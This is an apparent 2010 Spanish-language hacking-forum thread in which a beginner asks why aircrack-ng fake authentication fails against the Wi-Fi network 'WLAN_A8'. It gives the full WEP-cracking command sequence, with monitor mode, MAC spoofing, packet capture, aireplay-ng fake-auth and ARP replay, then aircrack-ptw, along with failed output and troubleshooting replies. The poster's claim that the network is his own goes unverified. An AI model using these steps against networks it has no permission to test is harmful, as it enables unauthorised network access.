Fallo al asociarme

Iniciado por descargar2, 1 Julio 2010, 23:50 PM

0 Miembros y 1 Visitante están viendo este tema.

descargar2

Hola dispongo de una Intel 5100 y un Belkin F5D7050, para mi sorpresa pensaba que seria mas difícil que en wifislax 3.1 pero fue todo lo contrario en Ubuntu 10.04 me las reconoció sin descargar driver ni nada.
Os dejo mis pasos que sigo:

iwconfig
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudomacchanger -m 00:12:22:33:44:56 wlan0
sudo ifconfig wlan0 up
sudo airodump.ng wlan0
sudo airodump-ng -c 9 -w captura wlan0
ubuntu@ubuntu:~$ sudo aireplay-ng -1 30 -o 1 -e WLAN_A8 -a (oculto) -h 00:12:22:33:44:56 wlan0  (nuevo terminal)
21:23:08  Waiting for beacon frame (BSSID: (oculto)) on channel 9

21:23:08  Sending Authentication Request (Open System)

21:23:10  Sending Authentication Request (Open System)

21:23:12  Sending Authentication Request (Open System)

21:23:14  Sending Authentication Request (Open System)

21:23:16  Sending Authentication Request (Open System)

21:23:18  Sending Authentication Request (Open System)

21:23:20  Sending Authentication Request (Open System)

21:23:22  Sending Authentication Request (Open System)

21:23:24  Sending Authentication Request (Open System)

21:23:26  Sending Authentication Request (Open System)

21:23:28  Sending Authentication Request (Open System)

21:23:30  Sending Authentication Request (Open System)

21:23:32  Sending Authentication Request (Open System)

21:23:34  Sending Authentication Request (Open System)

21:23:36  Sending Authentication Request (Open System)

21:23:38  Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

   * Perhaps MAC address filtering is enabled.
   * Check that the BSSID (-a option) is correct.
   * Try to change the number of packets (-o option).
   * The driver/card doesn't support injection.
   * This attack sometimes fails against some APs.
   * The card is not on the same channel as the AP.
   * You're too far from the AP. Get closer, or lower
     the transmit rate.



ubuntu@ubuntu:~$ sudo aireplay-ng -1 0 -e WLAN_A8 -a (oculto) -h 00:12:22:33:44:56 wlan0
21:14:46  Waiting for beacon frame (BSSID: (oculto)) on channel 9

21:14:46  Sending Authentication Request (Open System)

21:14:48  Sending Authentication Request (Open System)

21:14:50  Sending Authentication Request (Open System)

21:14:52  Sending Authentication Request (Open System)

21:14:54  Sending Authentication Request (Open System)

21:14:56  Sending Authentication Request (Open System)

21:14:58  Sending Authentication Request (Open System)

21:15:00  Sending Authentication Request (Open System)

21:15:02  Sending Authentication Request (Open System)

21:15:04  Sending Authentication Request (Open System)

21:15:06  Sending Authentication Request (Open System)

21:15:08  Sending Authentication Request (Open System)

21:15:10  Sending Authentication Request (Open System)

21:15:12  Sending Authentication Request (Open System)

21:15:14  Sending Authentication Request (Open System)

21:15:16  Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

   * Perhaps MAC address filtering is enabled.
   * Check that the BSSID (-a option) is correct.
   * Try to change the number of packets (-o option).
   * The driver/card doesn't support injection.
   * This attack sometimes fails against some APs.
   * The card is not on the same channel as the AP.
   * You're too far from the AP. Get closer, or lower
     the transmit rate.


Hay es donde me quedo estancado he probado estas 2 variantes pero nada.Luego seguiría con

aireplay-ng -3 -b (oculto) -h 00:12:22:33:44:56 wlan0
aircrack-ptw captura

¿Donde esta el error?
Estoy empezando con linux y aun no entiendo para que sirve cada comando
airodump-ng sirve para guardar las capturas
aireplay -1 no se
aireplay -3 Sirve para inyectar pero no se lo que es inyectar paquetes

Si conocéis alguna pagina para saber instalar programas y paquetes, dependiendo del formato del instalador seria de gran ayuda.
Saludos   :)

manute_powa

si te ha ido todo bien asta hay creo k te falta

aircrack-ptw captura-01.cap          y si no te funciona prueva con
aircrack-ng captura-01.cap

suerte y saludos

descargar2

No puedo asociarme para generar #Data con mas rapidez. Te he pegado el reporte para que veas el fallo que me aparece.

Gracias.

-- KiLiaN --

Prueba a ponerlo sin el -a
Entren al chat de elhacker.net
    
   

@kln13

descargar2

Nada de nada  :huh:

ubuntu@ubuntu:~$ sudo aireplay-ng -1 30 -o 1 -e WLAN_A8  -h 00:12:22:33:44:56 wlan0
The interface MAC (00:11:22:33:44:55) doesn't match the specified MAC (-h).
ifconfig wlan0 hw ether 00:12:22:33:44:56
23:47:20  Waiting for beacon frame (ESSID: WLAN_A8) on channel 9
Found BSSID "(oculto)" to given ESSID "WLAN_A8".

23:47:20  Sending Authentication Request (Open System)

23:47:22  Sending Authentication Request (Open System)

23:47:24  Sending Authentication Request (Open System)

23:47:26  Sending Authentication Request (Open System)

23:47:28  Sending Authentication Request (Open System)

23:47:30  Sending Authentication Request (Open System)

23:47:32  Sending Authentication Request (Open System)

23:47:34  Sending Authentication Request (Open System)

23:47:36  Sending Authentication Request (Open System)

23:47:38  Sending Authentication Request (Open System)

23:47:40  Sending Authentication Request (Open System)

23:47:42  Sending Authentication Request (Open System)

23:47:44  Sending Authentication Request (Open System)

23:47:46  Sending Authentication Request (Open System)

23:47:48  Sending Authentication Request (Open System)

23:47:50  Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
      the transmit rate.


ubuntu@ubuntu:~$ sudo aireplay-ng -1 0 -e WLAN_A8 -h 00:12:22:33:44:56 wlan0
The interface MAC (00:11:22:33:44:55) doesn't match the specified MAC (-h).
ifconfig wlan0 hw ether 00:12:22:33:44:56
23:53:01  Waiting for beacon frame (ESSID: WLAN_A8) on channel 9
Found BSSID "(oculto)" to given ESSID "WLAN_A8".

23:53:01  Sending Authentication Request (Open System)

23:53:03  Sending Authentication Request (Open System)

23:53:05  Sending Authentication Request (Open System)

23:53:07  Sending Authentication Request (Open System)

23:53:09  Sending Authentication Request (Open System)

23:53:11  Sending Authentication Request (Open System)

23:53:13  Sending Authentication Request (Open System)

23:53:15  Sending Authentication Request (Open System)

23:53:17  Sending Authentication Request (Open System)

23:53:19  Sending Authentication Request (Open System)

23:53:21  Sending Authentication Request (Open System)

23:53:23  Sending Authentication Request (Open System)

23:53:25  Sending Authentication Request (Open System)

23:53:27  Sending Authentication Request (Open System)

23:53:29  Sending Authentication Request (Open System)

23:53:31  Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
      the transmit rate.

jcrack

 ;-)
Este tipo de temas crea polemicas entre usuarios debido a que intentas asociarte a una red posiblemente ajena con filtrado MAC y eso esta prohibido preguntar aqui .

te aconsejo estudiar en el link que te adjunto a continuacion y tendras tu respuesta:

https://foro.elhacker.net/wireless_en_linux/guia_completa_aircrackng-t231434.0.html

me voy
cambio y fuera


descargar2

Quiero que quede claro que la autoria que estoy haciendo la estoy probando con mi red.

Gracias por el link.

zydas

Para saber si los drivers que trae ubuntu de tu tarjeta inyectan prueba..


aireplay-ng -9 wlan0

Saludos

Debci

Cita de: descargar2 en  3 Julio 2010, 05:16 AM
Quiero que quede claro que la autoria que estoy haciendo la estoy probando con mi red.

Gracias por el link.
xD amigo es auditoria no autoria xDDDDD
SEgundo, decirte y preguntarte si has puesto la tarjeta en modo monitor?

airmon-ng start wlan0

Si todo a ido bien deberias usar la interfaz mon0, la cual es una interfaz virtual creada por el airmon para poder inyectar trafico y poder hacer la falsa autentificación....

Luego preguntarte si te has parado a leer el reporte que te devuelve el programa:

   
   * Perhaps MAC address filtering is enabled.
   * Check that the BSSID (-a option) is correct.
   * Try to change the number of packets (-o option).
   * The driver/card doesn't support injection.
   * This attack sometimes fails against some APs.
   * The card is not on the same channel as the AP.
   * You're too far from the AP. Get closer, or lower
     the transmit rate.


Te recomiendo que leas primero como funciona una red, porque por lo visto no tienes ni idea de como funciona la suite.


Saludos

ChimoC

Buenas:

Echa un vistazo a lo que te ha dicho zydas

Otra cosa...si etás empezando...usa Wifiway que lleva lo necesario para que tus tarjetas funcionen

Echa un vistazo a las chinchetas

Un saludo

ChimoC